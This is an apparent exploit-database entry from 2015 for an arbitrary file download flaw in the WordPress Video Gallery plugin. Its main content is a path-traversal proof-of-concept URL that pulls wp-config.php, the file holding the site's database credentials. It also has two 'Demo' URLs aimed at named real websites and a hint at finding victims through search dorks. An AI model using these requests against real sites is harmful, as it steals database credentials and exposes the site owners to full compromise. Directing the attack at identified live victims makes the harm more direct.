Wordpress Video Gallery Arbitrary File Download Vulnerability

2015-01-29T00:00:00
ID 1337DAY-ID-23207
Type zdt
Reporter X-Line
Modified 2015-01-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title: Wordpress Plugins - Wordpress Video Gallery Arbitrary File Download Vulnerability
# Date: 17/01/2015
# Exploit Author: X-Line ( Empire North ) From  Tetouan
# Vendor Homepage: Dork : www.hdflvplayer.net
# Software Link: http://www.hdflvplayer.net/
# Tested on: Win8, Linux
# Google Dork: use your Braain ;)
######################
   
# Proof of Concept
 
http://[target]/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
  
 
#Demo
 
http://www.gerardbattenmep.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
http://kleenradio.com/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
 
 
Greetz to : HeroHero & all Membre Herochima .. Nik nik nik ... 7alwa 7alwa 7alwa.. stk stk stk ...3etina niko a7ambak :( [Klipcha]

#  0day.today [2018-02-19]  #